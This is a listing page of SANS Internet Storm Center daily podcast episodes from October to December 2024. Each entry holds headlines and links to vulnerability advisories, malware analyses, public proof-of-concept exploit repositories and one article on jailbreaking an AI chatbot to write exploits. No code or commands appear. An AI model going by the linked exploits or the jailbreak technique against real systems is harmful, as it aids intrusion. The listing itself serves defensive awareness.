SANS Internet Storm Center's Daily Network Security News Podcast
1,029 episodes — Page 8 of 21
Network Security News Summary for Wednesday December 04th, 2024
Files in Word; Sat Receiver DDoS Agent; Veeam Vuln; CVE-2024-49039 PoC; Extracting Files Embedded Inside Word Documents https://isc.sans.edu/diary/Extracting%20Files%20Embedded%20Inside%20Word%20Documents/31486 Korea arrests CEO for adding DDoS feature to satellite receivers https://www.bleepingcomputer.com/news/security/korea-arrests-ceo-for-adding-ddos-feature-to-satellite-receivers/ Veeam Vulnerabilities https://www.veeam.com/kb4679 WPTaskScheduler Presistence and CVE-2024-49039 PoC https://github.com/je5442804/WPTaskScheduler_CVE-2024-49039 keywords: word; satteliter; korea; receiver; ddoc; veeam; wptaksscheduler; scheduler;
Network Security News Summary for Tuesday December 03th, 2024
Credential Guard; AWS Key Rotation; Corrupt Document Phishing; IBM Security Verify Access Appliance vuln; Credential Guard and Kerberos delegation https://isc.sans.edu/diary/Credential%20Guard%20and%20Kerberos%20delegation/31488 The Day We Unveiled the Secret Rotation Illusion https://www.clutch.security/blog/the-day-we-unveiled-the-secret-rotation-illusion Corrupt Word Documents used in Phshing https://x.com/anyrun_app/status/1861024182210900357 IBM Security Verify Access Appliance Vulnerabilities https://www.ibm.com/support/pages/security-bulletin-multiple-security-vulnerabilities-were-found-ibm-security-verify-access-appliance-cve-2024-49803-cve-2024-49804-cve-2024-49805-cve-2024-49806 keywords: ibm; credentials; static; word; corrupt; aws; keys; apis; credential guard;
Network Security News Summary for Monday December 02th, 2024
AWS Honeypot+SIEM; Obfuscated Infostealer; Magento Skimmer; LogoFAIL Exploit; AWS DShield Sensor + DShield SIEM https://isc.sans.edu/diary/SANS%20ISC%20Internship%20Setup%3A%20AWS%20DShield%20Sensor%20%2B%20DShield%20SIEM%20%5BGuest%20Diary%5D/31480 From a Regular Infostealer to its Obfuscated Version https://isc.sans.edu/diary/From%20a%20Regular%20Infostealer%20to%20its%20Obfuscated%20Version/31484 Credit Card Skimmer Malware Targeting Magento Checkout Pages https://blog.sucuri.net/2024/11/credit-card-skimmer-malware-targeting-magento-checkout-pages.html LogoFAIL Exploited to Deploy Bootkitty, the first UEFI bootkit for Linux https://www.binarly.io/blog/logofail-exploited-to-deploy-bootkitty-the-first-uefi-bootkit-for-linux Stickers: https://isc.sans.edu/stickers.html (code PODCAST) keywords: stickers; logofail; bootkitty; skimmer; magento; infostealer; obfuscation; aws; dshield; sensor; siem
Network Security News Summary for Wednesday November 27th, 2024
Network Detection for Redtail; Next Neighbor; NachoVPN; Keycloak, PAN and Patches Using Zeek, Snort, and Grafana to Detect Crypto Mining Malware https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Using%20Zeek%2C%20Snort%2C%20and%20Grafana%20to%20Detect%20Crypto%20Mining%20Malware/31472 The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/ Introducing NachoVPN: One VPN Server to Pwn Them All https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/ Keycloak Patches https://github.com/keycloak/keycloak/security/advisories/GHSA-93ww-43rr-79v3 Palo Alto Networks Global Protect App https://security.paloaltonetworks.com/CVE-2024-5921 PHP Updates https://github.com/php/php-src/security/advisories/GHSA-g665-fm4p-vhff keywords: php; pan; keycloak; nachovpn; miner; wifi; next neighbor
Network Security News Summary for Tuesday November 26th, 2024
Quick JS Deobfuscation; PDFs with Passwords; Less Russian Servers; QNAP Bug; 7-ZIP Bug; Quick & Dirty Obfuscated JavaScript Analysis https://isc.sans.edu/diary/Quick%20%26%20Dirty%20Obfuscated%20JavaScript%20Analysis/31468 Decrypting a PDF With a User Password https://isc.sans.edu/diary/Decrypting%20a%20PDF%20With%20a%20User%20Password/31466 The strange case of disappearing Russian servers https://isc.sans.edu/diary/The%20strange%20case%20of%20disappearing%20Russian%20servers/31476 QNAP Buggy Firmware Update https://community.qnap.com/t/firmware-qts-5-2-2-2950-build-20241114-released/254 7-ZIP Zstandard Decompression Integer Underflow https://www.zerodayinitiative.com/advisories/ZDI-24-1532/ https://7-zip.org/download.html keywords: 7zip; qnap; russia; servers; shodan; pdf; javascript
Network Security News Summary for Saturday November 23th, 2024
SVG Phishing; FortiClient VPN Logging; Needrestart Vuln; Increase In Phishing SVG Attachments https://isc.sans.edu/diary/Increase%20In%20Phishing%20SVG%20Attachments/31456 Logging blind spot revealed in FortiClient VPN https://pentera.io/blog/FortiClient-VPN_logging-blind-spot-revealed/ Needrestart Vulnerability https://www.qualys.com/2024/11/19/needrestart/needrestart.txt keywords: needrestart; logging; forticlient; phishing; svg
Network Security News Summary for Friday November 22th, 2024
Apple Patches; Oracle PLM Vulns; OFBiz Patches; D-Link EOL Product Vulns Apple Patches Two Exploited Vulnerabilities https://isc.sans.edu/diary/Apple%20Fixes%20Two%20Exploited%20Vulnerabilities/31452 Oracle Patch for Agile Product Lifecycle Management CVE-2024-21287 https://www.oracle.com/security-alerts/alert-cve-2024-21287.html OFBiz Patches CVE-2024-47208 CVE-2024-48962 https://nvd.nist.gov/vuln/detail/CVE-2024-47208 https://seclists.org/oss-sec/2024/q4/95 D-Link Warns of Vulnerability in EOL Devices https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10415 keywords: ofbiz; d-link; oracle; apple
Network Security News Summary for Thursday November 21th, 2024
Network Security News Summary for Wednesday November 20th, 2024
Unpatched Citrix Vuln Exploited; Microsoft Power Pages Issues; Manageengine ADAudit Plus SQL Injection Exploit attempts for unpatched Citrix vulnerability CVE-2024-8068/CVE-2024-8069 https://isc.sans.edu/diary/Exploit+attempts+for+unpatched+Citrix+vulnerability/31446 https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US Microsoft Power Pages: Data Exposure Reviewed https://appomni.com/ao-labs/microsoft-power-pages-data-exposure-reviewed/ Zohocorp ManageEngine ADAudit Plus Vulnerable To SQL Injection Attacks CVE-2024-49574 https://www.manageengine.com/products/active-directory-audit/cve-2024-49574.html keywords: zohocorp; manageengine; adaudit; microsoft; power pages; ctrix
Network Security News Summary for Tuesday November 19th, 2024
Ancient Vulns; GitHub Impersonations; PaloAlto and Fortinet still not secure Ancient TP-Link Backdoor Discovered by Attackers https://isc.sans.edu/diary/Ancient%20TP-Link%20Backdoor%20Discovered%20by%20Attackers/31442 GitHub Projects Targeted with Malicious Commits To Frame Researchers https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/ PaloAlto and Fortinet Vulnerabilities https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/ https://security.paloaltonetworks.com/PAN-SA-2024-0015 https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/ keywords: paloalto; pan; fortinet; github; impersonation; tp-link;
Network Security News Summary for Wednesday November 13th, 2024
Microsoft Patch Tuesday; CISA Top Exploited Vulns; APT Embeds Malware Using Flutter Microsoft November 2024 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20November%202024%20Patch%20Tuesday/31438 CISA Top Routinely Exploited Vulnerabilities https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a APT Actors Embed Malware within macOS Flutter Applications https://www.jamf.com/blog/jamf-threat-labs-apt-actors-embed-malware-within-macos-flutter-applications/ keywords: apt; macos; flutter; cisa; microsoft; patches
Network Security News Summary for Tuesday November 12th, 2024
PDF Phish Analysis; Mazda Vulns; Ruby SAML Vuln Details; Veeam Vuln; Fake FBI EDRs; PDF Object Streams https://isc.sans.edu/diary/PDF%20Object%20Streams/31430 Mazda Infotainment Vulnerabilities https://www.zerodayinitiative.com/blog/2024/11/7/multiple-vulnerabilities-in-the-mazda-in-vehicle-infotainment-ivi-system Ruby SAML CVE-2024-45409: As bad as it gets and hiding in plain sight https://workos.com/blog/ruby-saml-cve-2024-45409 Veeam Backup Enterprise Manager Vulnerability https://www.veeam.com/kb4682 Security Update for Dell Enterprise SONiC Distribution Vulnerabilities https://www.dell.com/support/kbdoc/en-us/000245655/dsa-2024-449-security-update-for-dell-enterprise-sonic-distribution-vulnerabilities Easy Access to Information for Conducting Fraudulent Emergency Data Requests Impacts US-Based Companies and Law Enforcement Agencies https://www.ic3.gov/CSA/2024/241104.pdf keywords: fbi; dell; sonic; veeam; workos; ruby; saml; pdf; pdfid; pdf-parser
Network Security News Summary for Monday November 11th, 2024
zipdump and PKZIP; Am I Isolated; iOS Lock Reboot; PAN Bulletin; D-Link Vulns zipdump and pkzip records https://isc.sans.edu/diary/zipdump%20%26%20PKZIP%20Records/31428 Am I Isolated https://github.com/edera-dev/am-i-isolated Locked iPhones Reboot https://www.404media.co/police-freak-out-at-iphones-mysteriously-rebooting-themselves-locking-cops-out/ https://x.com/naehrdine/status/1854896392797360484 Palo Alto Networks Bulletin https://security.paloaltonetworks.com/PAN-SA-2024-0015 D-Link Vulnerability https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07 keywords: dlink; palo alto networks; pan; pan-os; iphones; docker; isolated; zipbdump; pkzip
Network Security News Summary for Friday November 08th, 2024
Malicious Steam Bruteforcer; Cisco and Veem Patches; ZIP file issues; File Upload Dangers; Steam Account Checker Poisoned with Infostealer https://isc.sans.edu/diary/Steam%20Account%20Checker%20Poisoned%20with%20Infostealer/31420 Cisco Ultra Reliable Wireless Backhaul Vulnerability https://www.cisco.com/site/us/en/products/networking/industrial-wireless/ultra-reliable-wireless-backhaul/index.html Breaking Down Multipart Parsers: File upload validation bypass https://blog.sicuranext.com/breaking-down-multipart-parsers-validation-bypass/ Evasive ZIP Concatenation: Trojan Targets Windows Users https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/ Veeam Backup Enterprise Manager Vulnerability (CVE-2024-40715) https://www.veeam.com/kb4682 SANS Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge-2024 keywords: holiday; hack; challenge; sans; veeam; backup; zip; concatentation; file upload; parser; cisco; steam;
Network Security News Summary for Thursday November 07th, 2024
Web Attack Surge; Air Fryer Privacy; Pygmy Goat Malware; Apple Vuln PoC; HPE Aruba critical vuln Insights from August Web Traffic Surge https://isc.sans.edu/forums/diary/%5BGuest%20Diary%5D%20Insights%20from%20August%20Web%20Traffic%20Surge/31408/ Talkative Air Fryer https://www.which.co.uk/policy-and-insight/article/why-is-my-air-fryer-spying-on-me-which-reveals-the-smart-devices-gathering-your-data-and-where-they-send-it-a9Fa24K6gY1c Pygmy Goat Malware Report https://www.ncsc.gov.uk/section/keep-up-to-date/malware-analysis-reports Apple CVE-2024-44258 PoC Exploit https://github.com/ifpdz/CVE-2024-44258 HPE Arruba vulnerabilities https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04722en_us&docLocale=en_US keywords: hpe; arruba; apple; Poc; pygmy; goat
Network Security News Summary for Wednesday November 06th, 2024
Python RAT Screen Share; Android Security Bulletin; VMs Delivery Malware; Fake Docusign Invoices Python RAT with a Nice Screensharing Feature https://isc.sans.edu/diary/Python%20RAT%20with%20a%20Nice%20Screensharing%20Feature/31414 Android Security Bulletin November 2024 https://source.android.com/docs/security/bulletin/2024-11-01 Malware Delivered as Virtual Machine https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/ Fake Docusign Invoices https://lab.wallarm.com/attackers-abuse-docusign-api-to-send-authentic-looking-invoices-at-scale/ keywords: docusign; malware; vm; android; november; python; rat; screensharing
Network Security News Summary for Tuesday November 05th, 2024
Analyzing Encrypted PDFs; Okta Passwordless Password Leak; QuRouter Patch; Google AI Tool finds SQLite vuln Analyzing an Encrypted Phishing PDF https://isc.sans.edu/diary/Analyzing%20an%20Encrypted%20Phishing%20PDF/31404 Okta Verify Desktop MFA For Windows Password Less Login CVE-2024-9191 https://trust.okta.com/security-advisories/okta-verify-desktop-mfa-for-windows-passwordless-login-cve-2024-9191/ QNAP QuRouter Vulnerability and Patch https://www.qnap.com/en/security-advisory/qsa-24-45 From Naptime to Big Sleep https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html Authenticated SQL injection vulnerability - ManageEngine ADManager Plus CVE-2024-48878 https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2024-48878.html keywords: zoho; manage engine; admanager; naptime; big sleep; qnap; qurouter; Okta; PDF; qpdf; pdf-parser;
Network Security News Summary for Monday November 04th, 2024
Odd SSH Username; QPDF; Okta bcrypt issue; Synology Patches; Fake Lastpass Reviews; October Activity with Username chenzilong https://isc.sans.edu/diary/October%202024%20Activity%20with%20Username%20chenzilong/31400 qpdf Extracting PDF Streams https://isc.sans.edu/diary/qpdf%3A%20Extracting%20PDF%20Streams/31406 Okta bcrypt issue https://trust.okta.com/security-advisories/okta-ad-ldap-delegated-authentication-username/ https://medium.com/@rajat29gupta/how-bcrypts-limitations-contributed-to-okta-s-vulnerability-a-lesson-for-developers-39425c644ed5 Synology Vulnerabilities https://www.synology.com/de-de/security/advisory/Synology_SA_24_19 https://www.synology.com/de-de/security/advisory/Synology_SA_24_18 Lastpass Fake Reviews https://blog.lastpass.com/posts/fake-web-store-reviews-attempting-to-steal-customer-data keywords: lastpass; synology; brcrypt; okta; chenzilong; qpdf;
Network Security News Summary for Thursday October 31th, 2024
RDP Gateway Scans; CyberPanel Exploited; QNAP Patches; Facebook Malvertising Scans for RDP Gateways https://isc.sans.edu/diary/Scans%20for%20RDP%20Gateways/31398 CyberPanel Exploited https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/ Windows Themes Files Spoofing CVE-2024-38030 https://blog.0patch.com/2024/10/we-patched-cve-2024-38030-found-another.html QNAP Patches CVE-2024-50388, CVE-2024-50387 https://www.qnap.com/en/security-advisory/qsa-24-41 Facebook Malvertising https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages/ keywords: facebook; malvertising; bussiness pages; meta; qnap; patches; windows themes; cyberpanel; NTLM; RDP; gateway; scans
Network Security News Summary for Wednesday October 30th, 2024
CyberPanel RCE; Spring WebFlux Vuln; MSFT Implements DANE; Attackers Enable RDP Critical RCE Vulnerabilty in Cyberpanel https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce Spring WebFlux Vulnerability https://access.redhat.com/security/cve/cve-2024-38821 https://spring.io/security/cve-2024-38821 Inbound SMTP DANE with DNSSEC for Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/announcing-general-availability-of-inbound-smtp-dane-with-dnssec/ba-p/4281292 HeptaX: Unauthorized RDP Connections for Cyberespionage Operations https://cyble.com/blog/heptax-unauthorized-rdp-connections-for-cyberespionage-operations/ keywords: heptax; dane; dnssec; rdp; spring; webflux; rce; cyberpanel
Network Security News Summary for Tuesday October 29th, 2024
Apple Updates; HTML File Phishing via Telegram; ChatGTP-4o Encoding Evasion Apple Update Everything https://isc.sans.edu/diary/Apple%20Updates%20Everything/31390 Selfcontained HTML Phishing Attachment Using Telegram to Exfiltrate Credentials https://isc.sans.edu/diary/Selfcontained+HTML+phishing+attachment+using+Telegram+to+exfiltrate+stolen+credentials/31388/ ChatGPT-4o Guardrail Jailbreak: Hex Encoding for Writing CVE Exploits https://0din.ai/blog/chatgpt-4o-guardrail-jailbreak-hex-encoding-for-writing-cve-exploits keywords: chatgpt; guardrails; apple; html phishing
Network Security News Summary for Monday October 28th, 2024
Old Ivanti Vulns Exploited; Arcadyan Wifi RCE; Okta iOS Vuln; TeamTNT Docker Hunt Two currently (old) exploited Ivanti vulnerabilities https://isc.sans.edu/diary/Two%20currently%20%28old%29%20exploited%20Ivanti%20vulnerabilities/31384 Arcadyan FMIMG51AX000J (WiFi Alliance) RCE CVE-2024-41992 https://ssd-disclosure.com/ssd-advisory-arcadyan-fmimg51ax000j-wifi-alliance-rce/ Okta iOS App Vulnerability CVE-2024-10327 https://trust.okta.com/security-advisories/okta-verify-for-ios-cve-2024-10327/ Threat Alert TeamTNT's docker gatling gun campaign https://www.aquasec.com/blog/threat-alert-teamtnts-docker-gatling-gun-campaign/ keywords: teamtnt; docker; miner; okta; ios; arcadyan; wifi; alliance; ivanti
Network Security News Summary for Friday October 25th, 2024
Dev Features in Prod; Cisco VPN DOS and Authenticed RCE; Hard Coded Cloud Credentials Development Features Enabled in Production https://isc.sans.edu/diary/Development%20Features%20Enabled%20in%20Prodcution/31380 Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/ Cisco Secure Firewall Management Center Software Command Injection Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-v3AWDqN7 Exposing the Danger Within: Hardcoded Cloud Credentials in Popular Mobile Apps https://www.security.com/threat-intelligence/exposing-danger-within-hardcoded-cloud-credentials-popular-mobile-apps keywords: cloud; mobile app; cisco; ssh; dos; vpn; development
Network Security News Summary for Thursday October 24th, 2024
Shell Scripts; Fortimanager Mess; Sharepoint Exploit; OpenSSL Patch; Reduced Cert Lifetime Everybody Loves Bash Scripts Including Attackers https://isc.sans.edu/diary/Everybody%20Loves%20Bash%20Scripts.%20Including%20Attackers./31376 Fortimanager Exploited Vulnerability https://www.fortiguard.com/psirt/FG-IR-24-423 Sharepoint Exploit https://www.cisa.gov/news-events/alerts/2024/10/22/cisa-adds-one-known-exploited-vulnerability-catalog https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC OpenSSL Vulnerability https://openssl-library.org/news/secadv/20241016.txt Reduced Certificate Lifetime https://github.com/cabforum/servercert/pull/553 keywords: certificate; openssl; cisa; sharepoint; fortinet; fortimanager; bash; scripts;
Network Security News Summary for Wednesday October 23th, 2024
HTTP vs. HTTPS; VMware, Unifi, Roundgroup, Atlassian, OneDev Patches, Vulnerability and Exploits How much HTTP (not HTTPS) Traffic is Traversing Your Perimeter? https://isc.sans.edu/diary/How%20much%20HTTP%20%28not%20HTTPS%29%20Traffic%20is%20Traversing%20Your%20Perimeter%3F/31372 VMSA-2024-0019:VMware vCenter Server updates address heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 Unifi Security Advisory Bulletin 043 https://community.ui.com/releases/Security-Advisory-Bulletin-043-043/28e45c75-314e-4f07-a4f3-d17f67bd53f7 Fake attachment. Roundcube mail server attacks exploit CVE-2024-37383 vulnerability. https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/fake-attachment-roundcube-mail-server-attacks-exploit-cve-2024-37383-vulnerability Atlassian Security Bulletin - October 15 2024 https://confluence.atlassian.com/security/security-bulletin-october-15-2024-1442910972.html OneDev Arbitrary file reading for unauthenticated user https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489 keywords: onedev; atlassian; roundcube; unifi; vmware; vcenter; http; https; tls
Network Security News Summary for Tuesday October 22th, 2024
Emergency Preparedness; HM Surf Exploited; Fortinet and ScienLogic Vague Patches A Network Nerd's Take on Emergency Preparedness https://isc.sans.edu/diary/A%20Network%20Nerd%27s%20Take%20on%20Emergency%20Preparedness/31356 HM Surf Vulnerability Access to Camera Exploited CVE-2024-44133 https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/ Fortinet releases patches for undisclosed critical FortiManager vulnerability https://www.helpnetsecurity.com/2024/10/21/fortimanager-critical-vulnerability/ ScienceLogic Vulnerability https://rackspace.service-now.com/system_status?id=detailed_status&service=4dafca5a87f41610568b206f8bbb35a6 https://docs.sciencelogic.com/latest/Content/Web_Admin_and_Accounts/System_Administration/sys_admin_system_upgrade.htm keywords: sciencelogic; rackspace; fortinet; fortimanager; hm surf; apple;
Network Security News Summary for Monday October 21th, 2024
Lost MSFT 365 Logs; Broken Cloud Storage; ESET Branded Malware; Synology, Spring and Grafana Updates Microsoft 365: Partially incomplete log data due to monitoring agent issue https://m365admin.handsontek.net/multiple-services-partially-incomplete-log-data-due-to-monitoring-agent-issue/ End-to-End Encrytped Cloud Storage in the Wild: A Broken Ecosystem https://brokencloudstorage.info/paper.pdf ESET Branded Malware https://x.com/ESETresearch/status/1847192384448172387 Synology Update https://www.synology.com/en-us/security/advisory/Synology_SA_24_17 Spring Framework Update CVe-2024-38819 CVE-2024-38820 https://spring.io/blog/2024/10/17/spring-framework-cve-2024-38819-and-cve-2024-38820-published Grafana Security Release CVE-2024-9264 https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/ keywords: grafana; spring; synology; eset;
Network Security News Summary for Friday October 18th, 2024
AWS Scans; Gatekeeper Bypass; Oracle CPU; Cisco ATA 190 Patch; SAP Code Injection; Dept of Commerce Advertises Drugs; Scanning Activity from Subnet 15.184.0.0/16. https://isc.sans.edu/diary/Scanning%20Activity%20from%20Subnet%2015.184.0.0%2016/31362 Gatekeeper Bypass /unit42.paloaltonetworks.com/gatekeeper-bypass-macos/ Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2024.html Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ata19x-multi-RDTEqRsy SAP Vulnerability https://redrays.io/blog/poc-sap-note-3433192-code-injection-vulnerability-in-sap-netweaver-as-java/ Dept. of Commerce Sites Advertising Medication https://x.com/tliston/status/1833542884047654984 keywords: doc; commerce; cisco; ata; oracle;
Network Security News Summary for Thursday October 17th, 2024
Not so Common Passwords; Security Bad Practices; Kubernetes Image Builder Vuln; Solarwinds Helpdesk Exploited; noexec bypass The Top 10 Not So Common SSH Usernames and Passwords https://isc.sans.edu/diary/The%20Top%2010%20Not%20So%20Common%20SSH%20Usernames%20and%20Passwords/31360 CISA Product Security Bad Practices https://www.cisa.gov/resources-tools/resources/product-security-bad-practices Kubernetes Image Builder Vulnerability CVE-2024-9486 CVE-2024-9594 https://discuss.kubernetes.io/t/security-advisory-cve-2024-9486-and-cve-2024-9594-vm-images-built-with-kubernetes-image-builder-use-default-credentials/30119 Solarwinds Hardcoded Password Exploited CVE-2024-28987 https://www.bleepingcomputer.com/news/security/solarwinds-web-help-desk-flaw-is-now-exploited-in-attacks/ Bypassing noexec and executing arbitrary binaries https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries Workshop Website: https://www.sansapi.com/ https://www.sansapi.com/docs keywords: api; workdshop; noexec; solarwinds; kubernetes; cisa;
Network Security News Summary for Wednesday October 16th, 2024
Demo Script Exploits; Angular-base64-upload Demo Script Exploited https://isc.sans.edu/diary/Angular-base64-upload%20Demo%20Script%20Exploited%20%28CVE-2024-42640%29/31354 Quantum Annealing Public Key Cryptographic Attack Algorithm Based on D-Wave Advantage http://cjc.ict.ac.cn/online/onlinepaper/wc-202458160402.pdf EDRSilencer https://github.com/netero1010/EDRSilencer Synchronizing Passkeys https://fidoalliance.org/specifications-credential-exchange-specifications/ keywords: passkeys; edrsilencer; quantum annealing; quantum computing; crypto; quantum; angular; base64; upload
Network Security News Summary for Tuesday October 15th, 2024
Blog Phishing; Fortigate Vuln Deep Dive; CLI Entrypoint Takeover Phishing Page Delivered Through a Blob URL https://isc.sans.edu/diary/Phishing%20Page%20Delivered%20Through%20a%20%20Blob%20URL/31350 Fortinet Fortigate CVE 2024-23113 deep dive https://labs.watchtowr.com/fortinet-fortigate-cve-2024-23113-a-super-complex-vulnerability-in-a-super-secure-appliance-in-2024/ This New Supply Chain Attack Technique Can Trojanize All Your CLI Commands https://checkmarx.com/blog/this-new-supply-chain-attack-technique-can-trojanize-all-your-cli-commands/ keywords: python; npm; entrypoint; cli; developers; phishing; blog; fortinet
Network Security News Summary for Monday October 14th, 2024
Windows PPTP/L2TP Deprecation; BIG-IP Cookie Issues; Travel Platforms Targeted Windows PPTP and L2TP Deprecation https://techcommunity.microsoft.com/t5/windows-server-news-and-best/pptp-and-l2tp-deprecation-a-new-era-of-secure-connectivity/ba-p/4263956 BIG-IP LTM Systems Unencrypted Cookie Exploitation https://www.cisa.gov/news-events/alerts/2024/10/10/best-practices-configure-big-ip-ltm-systems-encrypt-http-persistence-cookies https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/ https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/ keywords: pptp; l2tp; big-ip; cookies; travel; phishing
Network Security News Summary for Friday October 11th, 2024
GPTHoney; PaloAlto "Exploit"; Firefox 0-Day; GitLab Vuln; GPTHoney: A new class of honeypot https://isc.sans.edu/diary/GPTHoney%3A%20A%20new%20class%20of%20honeypot%20%5BGuest%20Diary%5D/31342 Palo Alto Expedition: From N-Day to Full Compromise https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/ Firefox 0-Day https://www.mozilla.org/en-US/security/advisories/mfsa2024-51/ GitLab Vulnerabilities Patched https://securityonline.info/cve-2024-9164-cvss-9-6-gitlab-users-urged-to-update-now/ keywords: gitlab; firefox; palo alto; expedition; gpthoney;
Network Security News Summary for Thursday October 10th, 2024
Perfctl to Infostealer; Wazuh Malware Distribution; USB Airgab Bridge; Fortigate Vuln Exploited From Perfctl to InfoStealer https://isc.sans.edu/diary/From%20Perfctl%20to%20InfoStealer/31334 Wazuh Abused by Miner Campaign https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/ USB Sticks Still Bridge Airgaps https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/ Fortigate Vulnerability now being exploited https://nvd.nist.gov/vuln/detail/CVE-2024-23113 keywords: fortigate; usb; bridge; arigap; wazuh; miner; infostealer; perfctl
Network Security News Summary for Wednesday October 09th, 2024
Microsoft Patch Tuesday; Adobe Patches; .io ccTLD discontinuing Microsoft Patch Tuesday - October 2024 https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20-%20October%202024/31336 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html The Disappearance of an Internet Domain https://every.to/p/the-disappearance-of-an-internet-domain keywords: .io; domain; adobe; patches; microsoft; october
Network Security News Summary for Tuesday October 08th, 2024
Sequoia Update Issues; Cisco Vuln; iTunes Priv Esc PoC; ISP Wiretap Spying macOS Sequoia: System/Network Admins, Hold On! https://isc.sans.edu/diary/macOS%20Sequoia%3A%20System%20Network%20Admins%2C%20Hold%20On!/31330 Cisco Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv34x-privesc-rce-qE33TCms Apple iTunes PoC https://github.com/mbog14/CVE-2024-44193 Attackers used ISP's Wiretap System to Spy on Users https://www.wsj.com/politics/national-security/china-cyberattack-internet-providers-260bd835 https://www.bleepingcomputer.com/news/security/atandt-verizon-reportedly-hacked-to-target-us-govt-wiretapping-platform/ keywords: isp; wiretap; attackers; apple; itunes; cisco; macos; sequoia;
Network Security News Summary for Monday October 07th, 2024
CUPS Vuln Scans; Exposed LDAP Servers; Visual Studio Dump File Exploits; Apple Updates Survey of CUPS exploit URLs https://isc.sans.edu/diary/Survey%20of%20CUPS%20exploit%20attempts/31326 Exposed LDAP Servers https://www.usenix.org/conference/usenixsecurity24/presentation/kaspereit Exploiting Visual Studio via Dump Files https://ynwarcs.github.io/exploiting-vs-dump-files Apple Security Updates https://support.apple.com/en-us/100100 Free API Security Workshop https://www.sans.org/webcasts/aviata-solo-flight-challenge-cloud-security-workshop-chapter-7/ keywords: apple; ldap; visual studio; cups
Network Security News Summary for Friday October 04th, 2024
DShieldKickStarted; Abused Cloud Services; Pixel Phones Baseband Security; Optigo Vulnerabilities Kickstart Your DShield Honeypot https://isc.sans.edu/diary/Kickstart%20Your%20DShield%20Honeypot%20%5BGuest%20Diary%5D/31320 CreanaKeeper Use of Cloud Services https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/ Pixel Addressing Vulnerabilities in Cellular Modems https://security.googleblog.com/2024/10/pixel-proactive-security-cellular-modems.html Optigo Spectra Vulnerabilities https://claroty.com/team82/disclosure-dashboard/cve-2024-41925 https://claroty.com/team82/disclosure-dashboard/cve-2024-45367 keywords: optigo; spectra; php; pixel; modems; baseband; creanakeeper; dropbox; kickstart; dshield
Network Security News Summary for Thursday October 03th, 2024
Security Docker Containers; CUPS DDoS Attack; Draytek Vulnerabilities; Security Related Docker Containers https://isc.sans.edu/diary/Security%20related%20Docker%20containers/31318 CUPS DDoS Attack https://www.akamai.com/blog/security-research/october-cups-ddos-threat Draytek Vulnerabilities https://www.forescout.com/resources/draybreak-draytek-research/ SANS Munich (free Community Night Tuesday October 15th) https://www.sans.org/cyber-security-training-events/munich-october-2024/ keywords: munich; bojan; draytek; cups; ddos; containers
Network Security News Summary for Wednesday October 02th, 2024
